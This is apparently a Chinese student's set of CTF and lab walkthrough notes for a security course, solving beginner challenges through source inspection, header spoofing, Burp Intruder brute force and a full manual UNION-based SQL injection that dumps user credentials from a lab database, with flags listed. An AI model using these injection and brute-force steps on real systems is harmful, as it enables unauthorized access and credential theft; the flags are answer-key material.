[TOC]

云计算技术与应用——期末安全✅

1. 攻防世界-Misc-Training-Stegano-1

2e5e19744c644912928eddc882f3b0b9.bmp
将文件后缀改为 txt 即可
flag 即为 passwd:stegancI

2. Bugku-杂项-Linux

1.tar.gz
解压得到 flag
记事本打开查找 key 即可
> key{feb81d3834e2423c9903f4755464060b}

3. Bugku-杂项-眼见非实(ISCCCTF)

眼见为实.docx
查看文件类型是zip,修改文件后缀为zip
解压后在 word 下的 document 查找 flag 即可
> flag{F1@g}

4. BugKu-Web-滑稽

场景——滑稽
右键检查或者 F12 
<!--flag{27e4f306c6e82f0b496f7fb5834d6415}
-->

5. 攻防世界-Web-view_source

场景——鼠标右键好像不管用了
F12
<!-- cyberpeace{5cbef5e03c5dab96e9e1f6fd0647a05c} -->

6. BugKu-Web-计算器

计算正确即可得到flag
右键检查或者 F12 
找到对应输入框 input 属性的 maxlength(最大长度)修改对应长度
输入答案即可
> flag{85a8f5b8c5fb5bc33f613964094e166b}

7. 攻防世界-Web- disabled_button

一个不能按的按钮
右键检查或者 F12 
对应位置删除 disabled 点击按钮
> cyberpeace{927147a05bc6fb54974cebac39556ad6}

8. BugKu-Web-GET

场景——代码
网址后面添加 ?what=flag
> flag{fe391628b1ee943ab92959229c32446c}

9. BUUCTF-Web-[极客大挑战2019]Havefun

场景——撸猫
右键检查或者 F12 
<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
-->
网址后面添加 ?cat=dog
> flag{34bc822d-0aab-4c9d-b7d6-800fa7a4154f}

10. BugKu-Web-POST

场景——代码
火狐浏览器打开,右键检查或者 F12 
hackbar 点击Post data 输入what=flag Execute运行
> flag{459bf61917595a35b753caeb157b3cbc}

image-20230615103953639

11. 攻防世界-Web新手区-get_post

HTTP通常使用两种请求方法
火狐浏览器打开
网址后面添加 /?a=1
右键检查或者 F12
hackbar 点击Post data 输入b=2 Execute运行
> cyberpeace{5a929201e2c7d60be8f71cdf9289400e}

image-20230615104809764

12. 攻防世界-Web-simple_php

php是最好的语言
网址后面添加 ?a=abcd&b=9999c
> Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}

13. BugKu-Web-头等舱

什么也没有。
Burp Suite 抓包,repeater(重放器)直接发送
> flag{25be29df337e2732cba0ac2642abc693}
image-20230615112128130

14. 攻防世界-Web-baby_web

想想初始页面是哪个
Burp Suite 抓包,repeater(重放器)
修改为 index.php 发送
> flag{very_baby_web}

image-20230618214819633

15. BugKu-Web-你从哪里来

are you from google?
Burp Suite 抓包,repeater(重放器)
请求添加 referer:http://www.google.com 发送
> flag{736d04657f00631a4be427244d2ebce2}

image-20230618215507581

16. BugKu-Web-程序员本地网站

请从本地访问!
Burp Suite 抓包,repeater(重放器)
请求添加 X-Forwarded-For:127.0.0.1 发送
> flag{634f163289a9da4d127839948049266f}

image-20230618220312636

17. 攻防世界-Web-xff_referer

xff和referer是可以伪造的。
Burp Suite 抓包,repeater(重放器)
请求添加
X-Forwarded-For:123.123.123.123
referer:https://www.google.com
> cyberpeace{a172cabb5cb63645b65a1a3361174a80}

image-20230618220927126

你知道什么是cookie吗?
Burp Suite 抓包,repeater(重放器)
请求 GET/ 后添加 cookie.php 发送
> cyberpeace{efd49536355952dd5034093e43f21bd9}

image-20230618221545231

19. BUUCTF-Web-[极客大挑战2019]Http

场景——靶机
右键检查或者 F12 找到secret.php
Burp Suite 抓包,repeater(重放器)
请求添加
Referer: https://Sycsecret.buuoj.cn
User-Agent:改为Syclover
X-Forwarded-for:127.0.0.1
> flag{b98e8e08-9de3-4e5a-9374-06e8a847f1b1}

image-20230618222758774

20. 完成墨者学院手工sql注入的题.

题目链接:

https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

XWAY科技管理系统V3.0
http://124.70.22.208:49490/new_list.php?id=1 order by 5
页面报错,确定字段为4
http://124.70.22.208:49490/new_list.php?id=-1 union select 1,2,3,4
确认显示字段为2和3
http://124.70.22.208:49490/new_list.php?id=-1 union select 1,database(),version(),4 查询数据库名字和版本
确定数据库名字为 mozhe_Discuz_StormGroup ,数据库版本为 5.7.22-0ubuntu0.16.04.1 。
http://124.70.22.208:49490/new_list.php?id=-1
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
查询数据库表名 StormGroup_member这张表放的是用户信息 notice这张表中放的是公告信息
http://124.70.22.208:49490/new_list.php?id=-1
union select 1,group_concat(column_name),group_concat(column_type),4 from information_schema.columns where table_name='StormGroup_member'
查询表中字段名
http://124.70.22.208:49490/new_list.php?id=-1
union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

md5解密后登陆即可
>>KEY:mozhe855094119b70cf3f593ee5940ac

image-20230618223725087

image-20230618223858795

image-20230618225209356

image-20230618225541794

image-20230618225758142

image-20230618230524828

21. 做sqlilabs 的less-1 (手工注入)。

Please input the ID as parameter with numeric value
http://sql.com/Less-1/?id=1 and 1=1 
返回数据
,,,,自求多福不写了

image-20230619231932435

22. 攻防世界-Web新手区- Robots

Robots协议
明确 Robots协议
网址后添加 /robots.txt
再打开 f1ag_1s_h3re.php 即可
> cyberpeace{b31def0011f6dbe7404834850501f354}

23. Bugku-Web-好像需要密码

输入查看密码
随便输入五位数
Burp Suite 抓包,Intruder(攻击器)
密码部分添加 $符号
payload 数值设定 10000~99999 间隔 1 开始攻击
> flag{0e0f6d09d796a2d77306fad0b461ed01}

24. 攻防世界-Web新手区-weak_auth

登陆验证页面
随便试一下发现 username 为 admin
Burp Suite 抓包,Intruder(攻击器)
payload 简单列表 自建密码本(123456) 开始攻击
>cyberpeace{cdfbf432778b4b636a16b4ca0302ffa4}

25. BugKu-Web-网站被黑

网站被黑了 黑客会不会留下后门
使用kali进行扫描,得到shell.php
Burp Suite 抓包,Intruder(攻击器)
payload 简单列表 列表添加密码 开始攻击
> flag{19f71b2df05b2c56f7f853e59334d991}

26. BUUCTF-Crypto-MD5

27120bd8-e273-4528-97a9-28dcebe236de.zip
解压文件--题目.txt
MD5解密(https://www.somd5.com/)
> admin1

27. Bugku-Crypto-你以为是MD5吗

file.txt

MD5加密密文是由a-f,0-9组成的,将该密文中MD5密文组成之外的字母删除,重新组成MD5密文
MD5解密(https://www.somd5.com/)
> 666666666666